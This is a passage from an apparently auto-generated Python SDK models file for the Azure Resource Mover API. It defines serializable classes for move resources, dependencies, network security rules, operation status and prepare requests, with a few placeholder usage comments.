:param value: Gets the list of move collections.
:type value: list[~resource_mover_service_api.models.MoveCollection]
:param next_link: Gets the value of next link.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[MoveCollection]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["MoveCollection"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(MoveCollectionResultList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class MoveErrorInfo(msrest.serialization.Model):
"""The move custom error info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar move_resources: The affected move resources.
:vartype move_resources: list[~resource_mover_service_api.models.AffectedMoveResource]
"""
_validation = {
'move_resources': {'readonly': True},
}
_attribute_map = {
'move_resources': {'key': 'moveResources', 'type': '[AffectedMoveResource]'},
}
def __init__(
self,
**kwargs
):
super(MoveErrorInfo, self).__init__(**kwargs)
self.move_resources = None
class MoveResource(msrest.serialization.Model):
"""Defines the move resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource Id for the resource.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource.
:vartype type: str
:param properties: Defines the move resource properties.
:type properties: ~resource_mover_service_api.models.MoveResourceProperties
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'MoveResourceProperties'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceProperties"] = None,
**kwargs
):
super(MoveResource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.properties = properties
class MoveResourceCollection(msrest.serialization.Model):
"""Defines the collection of move resources.
Variables are only populated by the server, and will be ignored when sending a request.
:param value: Gets the list of move resources.
:type value: list[~resource_mover_service_api.models.MoveResource]
:param next_link: Gets the value of next link.
:type next_link: str
:param summary_collection: Gets or sets the list of summary items and the field on which
summary is done.
:type summary_collection: ~resource_mover_service_api.models.SummaryCollection
:ivar total_count: Gets the total count.
:vartype total_count: long
"""
_validation = {
'total_count': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[MoveResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
'summary_collection': {'key': 'summaryCollection', 'type': 'SummaryCollection'},
'total_count': {'key': 'totalCount', 'type': 'long'},
}
def __init__(
self,
*,
value: Optional[List["MoveResource"]] = None,
next_link: Optional[str] = None,
summary_collection: Optional["SummaryCollection"] = None,
**kwargs
):
super(MoveResourceCollection, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
self.summary_collection = summary_collection
self.total_count = None
class MoveResourceDependency(msrest.serialization.Model):
"""Defines the dependency of the move resource.
:param id: Gets the source ARM ID of the dependent resource.
:type id: str
:param resolution_status: Gets the dependency resolution status.
:type resolution_status: str
:param resolution_type: Defines the resolution type. Possible values include: "Manual",
"Automatic".
:type resolution_type: str or ~resource_mover_service_api.models.ResolutionType
:param dependency_type: Defines the dependency type. Possible values include:
"RequiredForPrepare", "RequiredForMove".
:type dependency_type: str or ~resource_mover_service_api.models.DependencyType
:param manual_resolution: Defines the properties for manual resolution.
:type manual_resolution: ~resource_mover_service_api.models.ManualResolutionProperties
:param automatic_resolution: Defines the properties for automatic resolution.
:type automatic_resolution: ~resource_mover_service_api.models.AutomaticResolutionProperties
:param is_optional: Gets or sets a value indicating whether the dependency is optional.
:type is_optional: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'resolution_status': {'key': 'resolutionStatus', 'type': 'str'},
'resolution_type': {'key': 'resolutionType', 'type': 'str'},
'dependency_type': {'key': 'dependencyType', 'type': 'str'},
'manual_resolution': {'key': 'manualResolution', 'type': 'ManualResolutionProperties'},
'automatic_resolution': {'key': 'automaticResolution', 'type': 'AutomaticResolutionProperties'},
'is_optional': {'key': 'isOptional', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
resolution_status: Optional[str] = None,
resolution_type: Optional[Union[str, "ResolutionType"]] = None,
dependency_type: Optional[Union[str, "DependencyType"]] = None,
manual_resolution: Optional["ManualResolutionProperties"] = None,
automatic_resolution: Optional["AutomaticResolutionProperties"] = None,
is_optional: Optional[str] = None,
**kwargs
):
super(MoveResourceDependency, self).__init__(**kwargs)
self.id = id
self.resolution_status = resolution_status
self.resolution_type = resolution_type
self.dependency_type = dependency_type
self.manual_resolution = manual_resolution
self.automatic_resolution = automatic_resolution
self.is_optional = is_optional
class MoveResourceDependencyOverride(msrest.serialization.Model):
"""Defines the dependency override of the move resource.
:param id: Gets or sets the ARM ID of the dependent resource.
:type id: str
:param target_id: Gets or sets the resource ARM id of either the MoveResource or the resource
ARM ID of
the dependent resource.
:type target_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'target_id': {'key': 'targetId', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
target_id: Optional[str] = None,
**kwargs
):
super(MoveResourceDependencyOverride, self).__init__(**kwargs)
self.id = id
self.target_id = target_id
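# An illustrative dependency override: point a dependency at an existing
# target-side resource instead of a moved one. Both ARM IDs are placeholders.
#
#     override = MoveResourceDependencyOverride(
#         id='/subscriptions/.../virtualNetworks/source-vnet',
#         target_id='/subscriptions/.../virtualNetworks/existing-target-vnet',
#     )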
class MoveResourceErrorBody(msrest.serialization.Model):
"""An error response from the Azure Migrate service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: An identifier for the error. Codes are invariant and are intended to be consumed
programmatically.
:vartype code: str
:ivar message: A message describing the error, intended to be suitable for display in a user
interface.
:vartype message: str
:ivar target: The target of the particular error. For example, the name of the property in
error.
:vartype target: str
:ivar details: A list of additional details about the error.
:vartype details: list[~resource_mover_service_api.models.MoveResourceErrorBody]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'target': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
'details': {'key': 'details', 'type': '[MoveResourceErrorBody]'},
}
def __init__(
self,
**kwargs
):
super(MoveResourceErrorBody, self).__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
class MoveResourceFilter(msrest.serialization.Model):
"""Move resource filter.
:param properties:
:type properties: ~resource_mover_service_api.models.MoveResourceFilterProperties
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'MoveResourceFilterProperties'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceFilterProperties"] = None,
**kwargs
):
super(MoveResourceFilter, self).__init__(**kwargs)
self.properties = properties
class MoveResourceFilterProperties(msrest.serialization.Model):
"""MoveResourceFilterProperties.
:param provisioning_state: The provisioning state.
:type provisioning_state: str
"""
_attribute_map = {
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
}
def __init__(
self,
*,
provisioning_state: Optional[str] = None,
**kwargs
):
super(MoveResourceFilterProperties, self).__init__(**kwargs)
self.provisioning_state = provisioning_state
class MoveResourceProperties(msrest.serialization.Model):
"""Defines the move resource properties.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar provisioning_state: Defines the provisioning states. Possible values include:
"Succeeded", "Updating", "Creating", "Failed".
:vartype provisioning_state: str or ~resource_mover_service_api.models.ProvisioningState
:param source_id: Required. Gets or sets the Source ARM Id of the resource.
:type source_id: str
:ivar target_id: Gets or sets the Target ARM Id of the resource.
:vartype target_id: str
:param existing_target_id: Gets or sets the existing target ARM Id of the resource.
:type existing_target_id: str
:param resource_settings: Gets or sets the resource settings.
:type resource_settings: ~resource_mover_service_api.models.ResourceSettings
:ivar source_resource_settings: Gets or sets the source resource settings.
:vartype source_resource_settings: ~resource_mover_service_api.models.ResourceSettings
:ivar move_status: Defines the move resource status.
:vartype move_status: ~resource_mover_service_api.models.MoveResourcePropertiesMoveStatus
:ivar depends_on: Gets or sets the move resource dependencies.
:vartype depends_on: list[~resource_mover_service_api.models.MoveResourceDependency]
:param depends_on_overrides: Gets or sets the move resource dependencies overrides.
:type depends_on_overrides:
list[~resource_mover_service_api.models.MoveResourceDependencyOverride]
:ivar is_resolve_required: Gets a value indicating whether the resolve action is required over
the move collection.
:vartype is_resolve_required: bool
:ivar errors: Defines the move resource errors.
:vartype errors: ~resource_mover_service_api.models.MoveResourcePropertiesErrors
"""
_validation = {
'provisioning_state': {'readonly': True},
'source_id': {'required': True},
'target_id': {'readonly': True},
'source_resource_settings': {'readonly': True},
'move_status': {'readonly': True},
'depends_on': {'readonly': True},
'is_resolve_required': {'readonly': True},
'errors': {'readonly': True},
}
_attribute_map = {
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'source_id': {'key': 'sourceId', 'type': 'str'},
'target_id': {'key': 'targetId', 'type': 'str'},
'existing_target_id': {'key': 'existingTargetId', 'type': 'str'},
'resource_settings': {'key': 'resourceSettings', 'type': 'ResourceSettings'},
'source_resource_settings': {'key': 'sourceResourceSettings', 'type': 'ResourceSettings'},
'move_status': {'key': 'moveStatus', 'type': 'MoveResourcePropertiesMoveStatus'},
'depends_on': {'key': 'dependsOn', 'type': '[MoveResourceDependency]'},
'depends_on_overrides': {'key': 'dependsOnOverrides', 'type': '[MoveResourceDependencyOverride]'},
'is_resolve_required': {'key': 'isResolveRequired', 'type': 'bool'},
'errors': {'key': 'errors', 'type': 'MoveResourcePropertiesErrors'},
}
def __init__(
self,
*,
source_id: str,
existing_target_id: Optional[str] = None,
resource_settings: Optional["ResourceSettings"] = None,
depends_on_overrides: Optional[List["MoveResourceDependencyOverride"]] = None,
**kwargs
):
super(MoveResourceProperties, self).__init__(**kwargs)
self.provisioning_state = None
self.source_id = source_id
self.target_id = None
self.existing_target_id = existing_target_id
self.resource_settings = resource_settings
self.source_resource_settings = None
self.move_status = None
self.depends_on = None
self.depends_on_overrides = depends_on_overrides
self.is_resolve_required = None
self.errors = None
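# A hedged sketch of the client-settable shape here: only ``source_id`` is
# required, and everything marked readonly above is filled in by the service.
# The IDs and names are invented placeholders.
#
#     props = MoveResourceProperties(
#         source_id='/subscriptions/.../vaults/source-kv',
#         resource_settings=KeyVaultResourceSettings(
#             target_resource_name='target-kv',
#         ),
#     )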
class MoveResourcePropertiesErrors(MoveResourceError):
"""Defines the move resource errors.
:param properties: The move resource error body.
:type properties: ~resource_mover_service_api.models.MoveResourceErrorBody
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'MoveResourceErrorBody'},
}
def __init__(
self,
*,
properties: Optional["MoveResourceErrorBody"] = None,
**kwargs
):
super(MoveResourcePropertiesErrors, self).__init__(properties=properties, **kwargs)
class MoveResourceStatus(msrest.serialization.Model):
"""Defines the move resource status.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar move_state: Defines the MoveResource states. Possible values include:
"AssignmentPending", "PreparePending", "PrepareInProgress", "PrepareFailed", "MovePending",
"MoveInProgress", "MoveFailed", "DiscardInProgress", "DiscardFailed", "CommitPending",
"CommitInProgress", "CommitFailed", "Committed", "DeleteSourcePending",
"ResourceMoveCompleted".
:vartype move_state: str or ~resource_mover_service_api.models.MoveState
:param job_status: Defines the job status.
:type job_status: ~resource_mover_service_api.models.JobStatus
:param errors: An error response from the azure resource mover service.
:type errors: ~resource_mover_service_api.models.MoveResourceError
"""
_validation = {
'move_state': {'readonly': True},
}
_attribute_map = {
'move_state': {'key': 'moveState', 'type': 'str'},
'job_status': {'key': 'jobStatus', 'type': 'JobStatus'},
'errors': {'key': 'errors', 'type': 'MoveResourceError'},
}
def __init__(
self,
*,
job_status: Optional["JobStatus"] = None,
errors: Optional["MoveResourceError"] = None,
**kwargs
):
super(MoveResourceStatus, self).__init__(**kwargs)
self.move_state = None
self.job_status = job_status
self.errors = errors
class MoveResourcePropertiesMoveStatus(MoveResourceStatus):
"""Defines the move resource status.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar move_state: Defines the MoveResource states. Possible values include:
"AssignmentPending", "PreparePending", "PrepareInProgress", "PrepareFailed", "MovePending",
"MoveInProgress", "MoveFailed", "DiscardInProgress", "DiscardFailed", "CommitPending",
"CommitInProgress", "CommitFailed", "Committed", "DeleteSourcePending",
"ResourceMoveCompleted".
:vartype move_state: str or ~resource_mover_service_api.models.MoveState
:param job_status: Defines the job status.
:type job_status: ~resource_mover_service_api.models.JobStatus
:param errors: An error response from the azure resource mover service.
:type errors: ~resource_mover_service_api.models.MoveResourceError
"""
_validation = {
'move_state': {'readonly': True},
}
_attribute_map = {
'move_state': {'key': 'moveState', 'type': 'str'},
'job_status': {'key': 'jobStatus', 'type': 'JobStatus'},
'errors': {'key': 'errors', 'type': 'MoveResourceError'},
}
def __init__(
self,
*,
job_status: Optional["JobStatus"] = None,
errors: Optional["MoveResourceError"] = None,
**kwargs
):
super(MoveResourcePropertiesMoveStatus, self).__init__(job_status=job_status, errors=errors, **kwargs)
class NetworkInterfaceResourceSettings(ResourceSettings):
"""Defines the network interface resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
     Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param ip_configurations: Gets or sets the IP configurations of the NIC.
:type ip_configurations:
list[~resource_mover_service_api.models.NicIpConfigurationResourceSettings]
:param enable_accelerated_networking: Gets or sets a value indicating whether accelerated
networking is enabled.
:type enable_accelerated_networking: bool
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'ip_configurations': {'key': 'ipConfigurations', 'type': '[NicIpConfigurationResourceSettings]'},
'enable_accelerated_networking': {'key': 'enableAcceleratedNetworking', 'type': 'bool'},
}
def __init__(
self,
*,
target_resource_name: str,
ip_configurations: Optional[List["NicIpConfigurationResourceSettings"]] = None,
enable_accelerated_networking: Optional[bool] = None,
**kwargs
):
super(NetworkInterfaceResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/networkInterfaces' # type: str
self.ip_configurations = ip_configurations
self.enable_accelerated_networking = enable_accelerated_networking
class NetworkSecurityGroupResourceSettings(ResourceSettings):
"""Defines the NSG resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
     Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param security_rules: Gets or sets Security rules of network security group.
:type security_rules: list[~resource_mover_service_api.models.NsgSecurityRule]
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'security_rules': {'key': 'securityRules', 'type': '[NsgSecurityRule]'},
}
def __init__(
self,
*,
target_resource_name: str,
security_rules: Optional[List["NsgSecurityRule"]] = None,
**kwargs
):
super(NetworkSecurityGroupResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/networkSecurityGroups' # type: str
self.security_rules = security_rules
class NicIpConfigurationResourceSettings(msrest.serialization.Model):
"""Defines NIC IP configuration properties.
:param name: Gets or sets the IP configuration name.
:type name: str
:param private_ip_address: Gets or sets the private IP address of the network interface IP
Configuration.
:type private_ip_address: str
:param private_ip_allocation_method: Gets or sets the private IP address allocation method.
:type private_ip_allocation_method: str
:param subnet: Defines reference to subnet.
:type subnet: ~resource_mover_service_api.models.SubnetReference
:param primary: Gets or sets a value indicating whether this IP configuration is the primary.
:type primary: bool
:param load_balancer_backend_address_pools: Gets or sets the references of the load balancer
backend address pools.
:type load_balancer_backend_address_pools:
list[~resource_mover_service_api.models.LoadBalancerBackendAddressPoolReference]
:param load_balancer_nat_rules: Gets or sets the references of the load balancer NAT rules.
:type load_balancer_nat_rules:
list[~resource_mover_service_api.models.LoadBalancerNatRuleReference]
:param public_ip: Defines reference to a public IP.
:type public_ip: ~resource_mover_service_api.models.PublicIpReference
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'private_ip_address': {'key': 'privateIpAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'privateIpAllocationMethod', 'type': 'str'},
'subnet': {'key': 'subnet', 'type': 'SubnetReference'},
'primary': {'key': 'primary', 'type': 'bool'},
'load_balancer_backend_address_pools': {'key': 'loadBalancerBackendAddressPools', 'type': '[LoadBalancerBackendAddressPoolReference]'},
'load_balancer_nat_rules': {'key': 'loadBalancerNatRules', 'type': '[LoadBalancerNatRuleReference]'},
'public_ip': {'key': 'publicIp', 'type': 'PublicIpReference'},
}
def __init__(
self,
*,
name: Optional[str] = None,
private_ip_address: Optional[str] = None,
private_ip_allocation_method: Optional[str] = None,
subnet: Optional["SubnetReference"] = None,
primary: Optional[bool] = None,
load_balancer_backend_address_pools: Optional[List["LoadBalancerBackendAddressPoolReference"]] = None,
load_balancer_nat_rules: Optional[List["LoadBalancerNatRuleReference"]] = None,
public_ip: Optional["PublicIpReference"] = None,
**kwargs
):
super(NicIpConfigurationResourceSettings, self).__init__(**kwargs)
self.name = name
self.private_ip_address = private_ip_address
self.private_ip_allocation_method = private_ip_allocation_method
self.subnet = subnet
self.primary = primary
self.load_balancer_backend_address_pools = load_balancer_backend_address_pools
self.load_balancer_nat_rules = load_balancer_nat_rules
self.public_ip = public_ip
class NsgReference(AzureResourceReference):
"""Defines reference to NSG.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
**kwargs
):
super(NsgReference, self).__init__(source_arm_resource_id=source_arm_resource_id, **kwargs)
class NsgSecurityRule(msrest.serialization.Model):
"""Security Rule data model for Network Security Groups.
:param name: Gets or sets the Security rule name.
:type name: str
:param access: Gets or sets whether network traffic is allowed or denied.
Possible values are “Allow” and “Deny”.
:type access: str
:param description: Gets or sets a description for this rule. Restricted to 140 chars.
:type description: str
:param destination_address_prefix: Gets or sets destination address prefix. CIDR or source IP
range.
A “*” can also be used to match all source IPs. Default tags such
as ‘VirtualNetwork’, ‘AzureLoadBalancer’ and ‘Internet’ can also be used.
:type destination_address_prefix: str
:param destination_port_range: Gets or sets Destination Port or Range. Integer or range between
0 and 65535. A “*” can also be used to match all ports.
:type destination_port_range: str
    :param direction: Gets or sets the direction of the rule. Inbound or Outbound. The
direction specifies if rule will be evaluated on incoming or outgoing traffic.
:type direction: str
:param priority: Gets or sets the priority of the rule. The value can be between
100 and 4096. The priority number must be unique for each rule in the collection.
The lower the priority number, the higher the priority of the rule.
:type priority: int
:param protocol: Gets or sets Network protocol this rule applies to. Can be Tcp, Udp or All(*).
:type protocol: str
:param source_address_prefix: Gets or sets source address prefix. CIDR or source IP range. A
“*” can also be used to match all source IPs. Default tags such as ‘VirtualNetwork’,
‘AzureLoadBalancer’ and ‘Internet’ can also be used. If this is an ingress
rule, specifies where network traffic originates from.
:type source_address_prefix: str
:param source_port_range: Gets or sets Source Port or Range. Integer or range between 0 and
     65535. A “*” can also be used to match all ports.
:type source_port_range: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'access': {'key': 'access', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'destination_address_prefix': {'key': 'destinationAddressPrefix', 'type': 'str'},
'destination_port_range': {'key': 'destinationPortRange', 'type': 'str'},
'direction': {'key': 'direction', 'type': 'str'},
'priority': {'key': 'priority', 'type': 'int'},
'protocol': {'key': 'protocol', 'type': 'str'},
'source_address_prefix': {'key': 'sourceAddressPrefix', 'type': 'str'},
'source_port_range': {'key': 'sourcePortRange', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
access: Optional[str] = None,
description: Optional[str] = None,
destination_address_prefix: Optional[str] = None,
destination_port_range: Optional[str] = None,
direction: Optional[str] = None,
priority: Optional[int] = None,
protocol: Optional[str] = None,
source_address_prefix: Optional[str] = None,
source_port_range: Optional[str] = None,
**kwargs
):
super(NsgSecurityRule, self).__init__(**kwargs)
self.name = name
self.access = access
self.description = description
self.destination_address_prefix = destination_address_prefix
self.destination_port_range = destination_port_range
self.direction = direction
self.priority = priority
self.protocol = protocol
self.source_address_prefix = source_address_prefix
self.source_port_range = source_port_range
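# A minimal usage sketch (hypothetical values): a typical inbound rule
# allowing SSH from anywhere to a subnet.
#
#   rule = NsgSecurityRule(
#       name='allow-ssh',
#       access='Allow',
#       direction='Inbound',
#       priority=300,
#       protocol='Tcp',
#       source_address_prefix='*',
#       source_port_range='*',
#       destination_address_prefix='10.0.0.0/24',
#       destination_port_range='22',
#   )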
class OperationErrorAdditionalInfo(msrest.serialization.Model):
"""The operation error info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The error type.
:vartype type: str
:ivar info: The operation error info.
:vartype info: ~resource_mover_service_api.models.MoveErrorInfo
"""
_validation = {
'type': {'readonly': True},
'info': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'info': {'key': 'info', 'type': 'MoveErrorInfo'},
}
def __init__(
self,
**kwargs
):
super(OperationErrorAdditionalInfo, self).__init__(**kwargs)
self.type = None
self.info = None
class OperationsDiscovery(msrest.serialization.Model):
"""Operations discovery class.
:param name: Gets or sets Name of the API.
The name of the operation being performed on this particular object. It should
match the action name that appears in RBAC / the event service.
Examples of operations include:
* Microsoft.Compute/virtualMachine/capture/action
* Microsoft.Compute/virtualMachine/restart/action
* Microsoft.Compute/virtualMachine/write
* Microsoft.Compute/virtualMachine/read
* Microsoft.Compute/virtualMachine/delete
Each action should include, in order:
(1) Resource Provider Namespace
(2) Type hierarchy for which the action applies (e.g. server/databases for a SQL
Azure database)
(3) Read, Write, Action or Delete indicating which type applies. If it is a PUT/PATCH
on a collection or named value, Write should be used.
If it is a GET, Read should be used. If it is a DELETE, Delete should be used. If it
is a POST, Action should be used.
As a note: all resource providers would need to include the "{Resource Provider
Namespace}/register/action" operation in their response.
This API is used to register for their service, and should include details about the
operation (e.g. a localized name for the resource provider + any special
considerations like PII release).
:type name: str
:param is_data_action: Indicates whether the operation is a data action.
:type is_data_action: bool
:param display: Contains the localized display information for this particular operation /
action. These
values will be used by several clients for
(1) custom role definitions for RBAC;
(2) complex query filters for the event service; and
(3) audit history / records for management operations.
:type display: ~resource_mover_service_api.models.Display
:param origin: Gets or sets Origin.
The intended executor of the operation; governs the display of the operation in the
RBAC UX and the audit logs UX.
Default value is "user,system".
:type origin: str
:param properties: Any object.
:type properties: any
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
'display': {'key': 'display', 'type': 'Display'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'object'},
}
def __init__(
self,
*,
name: Optional[str] = None,
is_data_action: Optional[bool] = None,
display: Optional["Display"] = None,
origin: Optional[str] = None,
properties: Optional[Any] = None,
**kwargs
):
super(OperationsDiscovery, self).__init__(**kwargs)
self.name = name
self.is_data_action = is_data_action
self.display = display
self.origin = origin
self.properties = properties
class OperationsDiscoveryCollection(msrest.serialization.Model):
"""Collection of ClientDiscovery details.
:param value: Gets or sets the ClientDiscovery details.
:type value: list[~resource_mover_service_api.models.OperationsDiscovery]
:param next_link: Gets or sets the value of next link.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[OperationsDiscovery]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["OperationsDiscovery"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(OperationsDiscoveryCollection, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class OperationStatus(msrest.serialization.Model):
"""Operation status REST resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Operation name.
:vartype name: str
:ivar status: Status of the operation. ARM expects the terminal status to be one of Succeeded/
Failed/ Canceled. All other values imply that the operation is still running.
:vartype status: str
:ivar start_time: Start time.
:vartype start_time: str
:ivar end_time: End time.
:vartype end_time: str
:ivar error: Error stating all error details for the operation.
:vartype error: ~resource_mover_service_api.models.OperationStatusError
:ivar properties: Custom data.
:vartype properties: any
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'status': {'readonly': True},
'start_time': {'readonly': True},
'end_time': {'readonly': True},
'error': {'readonly': True},
'properties': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'error': {'key': 'error', 'type': 'OperationStatusError'},
'properties': {'key': 'properties', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(OperationStatus, self).__init__(**kwargs)
self.id = None
self.name = None
self.status = None
self.start_time = None
self.end_time = None
self.error = None
self.properties = None
class OperationStatusError(msrest.serialization.Model):
"""Class for operation status errors.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar details: The error details.
:vartype details: list[~resource_mover_service_api.models.OperationStatusError]
:ivar additional_info: The additional info.
:vartype additional_info: list[~resource_mover_service_api.models.OperationErrorAdditionalInfo]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'details': {'readonly': True},
'additional_info': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'details': {'key': 'details', 'type': '[OperationStatusError]'},
'additional_info': {'key': 'additionalInfo', 'type': '[OperationErrorAdditionalInfo]'},
}
def __init__(
self,
**kwargs
):
super(OperationStatusError, self).__init__(**kwargs)
self.code = None
self.message = None
self.details = None
self.additional_info = None
class PrepareRequest(msrest.serialization.Model):
"""Defines the request body for initiate prepare operation.
All required parameters must be populated in order to send to Azure.
:param validate_only: Gets or sets a value indicating whether the operation needs to only run
pre-requisite.
:type validate_only: bool
:param move_resources: Required. Gets or sets the list of resource Id's, by default it accepts
move resource id's unless the input type is switched via moveResourceInputType property.
:type move_resources: list[str]
:param move_resource_input_type: Defines the move resource input type. Possible values include:
"MoveResourceId", "MoveResourceSourceId".
:type move_resource_input_type: str or ~resource_mover_service_api.models.MoveResourceInputType
"""
_validation = {
'move_resources': {'required': True},
}
_attribute_map = {
'validate_only': {'key': 'validateOnly', 'type': 'bool'},
'move_resources': {'key': 'moveResources', 'type': '[str]'},
'move_resource_input_type': {'key': 'moveResourceInputType', 'type': 'str'},
}
def __init__(
self,
*,
move_resources: List[str],
validate_only: Optional[bool] = None,
move_resource_input_type: Optional[Union[str, "MoveResourceInputType"]] = None,
**kwargs
):
super(PrepareRequest, self).__init__(**kwargs)
self.validate_only = validate_only
self.move_resources = move_resources
self.move_resource_input_type = move_resource_input_type
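# A minimal usage sketch (hypothetical ARM ID): preparing a resource by its
# source ARM ID rather than its move-resource ID, in validate-only mode.
#
#   request = PrepareRequest(
#       move_resources=['/subscriptions/.../providers/Microsoft.Compute/virtualMachines/vm1'],
#       validate_only=True,
#       move_resource_input_type='MoveResourceSourceId',
#   )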
class PublicIPAddressResourceSettings(ResourceSettings):
"""Defines the public IP address resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines. Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param domain_name_label: Gets or sets the domain name label.
:type domain_name_label: str
:param fqdn: Gets or sets the fully qualified domain name.
:type fqdn: str
:param public_ip_allocation_method: Gets or sets public IP allocation method.
:type public_ip_allocation_method: str
:param sku: Gets or sets public IP sku.
:type sku: str
:param zones: Gets or sets public IP zones.
:type zones: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'domain_name_label': {'key': 'domainNameLabel', 'type': 'str'},
'fqdn': {'key': 'fqdn', 'type': 'str'},
'public_ip_allocation_method': {'key': 'publicIpAllocationMethod', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'str'},
'zones': {'key': 'zones', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
domain_name_label: Optional[str] = None,
fqdn: Optional[str] = None,
public_ip_allocation_method: Optional[str] = None,
sku: Optional[str] = None,
zones: Optional[str] = None,
**kwargs
):
super(PublicIPAddressResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/publicIPAddresses' # type: str
self.domain_name_label = domain_name_label
self.fqdn = fqdn
self.public_ip_allocation_method = public_ip_allocation_method
self.sku = sku
self.zones = zones
class PublicIpReference(AzureResourceReference):
"""Defines reference to a public IP.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
**kwargs
):
